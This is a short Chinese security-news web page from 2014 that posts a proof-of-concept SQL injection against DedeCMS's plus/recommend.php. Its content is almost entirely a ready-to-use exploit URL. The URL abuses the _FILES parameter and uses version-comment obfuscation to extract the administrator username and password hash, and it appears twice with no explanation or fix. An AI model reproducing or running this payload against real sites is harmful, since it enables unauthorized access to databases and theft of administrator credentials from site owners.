热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

DEDECMS最新通杀注入

发布时间:2014-02-28 16:45文章来源:网络文章作者:秩名 点击次数:
摘要:POC代码: www.yunsec.net/plus/recommend.php?action=aid=1_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+_FILES[type][name]=1.j...

 

DEDE最新漏洞

POC代码:
www.yunsec.net/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878

 

标签分类:

上一篇:深喉咙CMS(shlcms PHP)SQL注射0day
下一篇:Shopwind网店系统管理后台验证绕过漏洞